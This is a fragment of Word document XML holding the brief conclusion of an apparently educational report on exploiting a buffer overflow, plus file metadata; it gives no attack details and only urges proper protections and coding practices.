        <w:t>8. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385A4F86" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="2E196EDB" w14:textId="7BA98E55" w:rsidR="00C91141" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>The successful exploitation of this vulnerability shows the critical nature of buffer overflow protections. While this was an educational exercise, in real-world applications such vulnerabilities could lead to serious security breaches. Proper security measures and coding practices are essential to prevent such vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C9114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73"/>
    <w:rsid w:val="004452D8"/>
    <w:rsid w:val="00C91141"/>
    <w:rsid w:val="00C93296"/>
    <w:rsid w:val="00E4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28613"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CAA91B55-90A6-9844-9A6D-7F08FDFC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F7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F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0F7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F7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0F7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0F7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0F7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0F7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0F7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0F7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0F7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0F7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0F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0F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0F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0F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0F7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0F7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0F7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0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0F7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0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임새연</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>임새연</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-05T04:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-05T04:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>